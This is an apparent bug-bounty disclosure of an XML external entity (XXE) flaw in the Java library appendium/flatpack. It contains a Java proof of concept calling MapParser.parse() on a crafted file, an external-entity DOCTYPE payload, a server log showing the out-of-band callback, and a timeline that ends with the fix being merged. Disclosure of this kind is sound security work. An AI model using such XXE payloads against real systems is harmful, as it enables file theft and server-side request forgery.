Improper Restriction of XML External Entity Reference in appendium/flatpack


Reported on Oct 18th 2021

flatpack is vulnerable to XML External Entity (XXE) injection. An attacker able to supply a crafted XML file as input to the parse() function in the affected file can cause the parser to resolve external entities (XXE).

Proof of Concept


import java.io.FileReader;
import java.io.Reader;

import net.sf.flatpack.xml.*;

public class Poc {

    @SuppressWarnings({ "unused" })
    public static void main(String[] args) {
        try {
            // The crafted XML file is handed straight to flatpack's map parser.
            Reader reader = new FileReader("C:\\Users\\srika\\eclipse-workspace\\poc\\src\\main\\resources\\sample-ssrf.xml");
            MapParser.parse(reader, null);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}


<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "">]>


Serving HTTP on :: port 8800 (http://[::]:8800/) ...
::ffff: - - [18/Oct/2021 15:10:34] "GET /test.txt HTTP/1.1" 200 -
Timeline

- We created a GitHub Issue asking the maintainers to create a (a month ago)
- We have contacted a member of the appendium/flatpack team and are waiting to hear back (a month ago)
- We have sent a follow up to the appendium/flatpack team. We will try again in 7 days. (a month ago)
- Benoit Xhenseval validated this vulnerability (a month ago)
- Srikanth Prathi has been awarded the disclosure bounty
- The fix bounty is now up for grabs
- Benoit Xhenseval confirmed that a fix has been merged on 5ebef7 (a month ago)
- Srikanth Prathi has been awarded the fix bounty